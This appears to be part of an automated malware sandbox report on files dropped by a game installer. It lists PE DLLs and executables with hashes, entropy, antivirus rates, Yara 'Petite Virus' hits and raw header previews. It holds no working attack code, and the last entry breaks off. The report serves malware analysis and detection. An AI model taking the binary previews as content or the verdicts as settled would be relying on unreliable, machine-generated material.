                                                                                          Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):394752
                                                                                          Entropy (8bit):6.662070316214798
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                          MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                          SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                          SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                          SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):867854
                                                                                          Entropy (8bit):4.9264497464202694
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                          MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                          SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                          SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                          SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p................................*..........................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc...*.......,..................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):112640
                                                                                          Entropy (8bit):6.540227486061059
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                          MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                          SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                          SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                          SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):266254
                                                                                          Entropy (8bit):6.343813822604148
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                                          MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                                          SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                                          SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                                          SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):7910
                                                                                          Entropy (8bit):6.931925007191986
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                          MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                          SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                          SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                          SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34392
                                                                                          Entropy (8bit):7.81689943223162
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                          MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                          SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                          SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                          SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):26526
                                                                                          Entropy (8bit):4.600837395607617
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                          MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                          SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                          SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                          SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                          Malicious:false
                                                                                          Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):68876
                                                                                          Entropy (8bit):7.922125376804506
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                          MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                          SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                          SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                          SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):562190
                                                                                          Entropy (8bit):6.388293171196564
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                          MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                          SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                          SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                          SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):315918
                                                                                          Entropy (8bit):6.5736483262229735
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                          MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                          SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                          SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                          SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):214016
                                                                                          Entropy (8bit):6.676457645865373
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                          MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                          SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                          SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                          SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):240654
                                                                                          Entropy (8bit):6.518503846592995
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                          MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                          SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                          SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                          SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):197646
                                                                                          Entropy (8bit):6.1570532273946625
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                          MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                          SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                          SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                          SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):13838
                                                                                          Entropy (8bit):5.173769974589746
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                          MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                          SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                          SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                          SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):648384
                                                                                          Entropy (8bit):6.666474522542094
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                                          MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                                          SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                                          SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                                          SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):15374
                                                                                          Entropy (8bit):5.192037544202194
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                          MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                          SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                          SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                          SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):11532
                                                                                          Entropy (8bit):7.219753259626605
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                                          MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                                          SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                                          SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                                          SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp, Author: Joe Security
                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):43520
                                                                                          Entropy (8bit):6.232860260916194
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                          MD5:B162992412E08888456AE13BA8BD3D90
                                                                                          SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                          SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                          SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):31936
                                                                                          Entropy (8bit):6.6461204214578
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                          MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                          SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
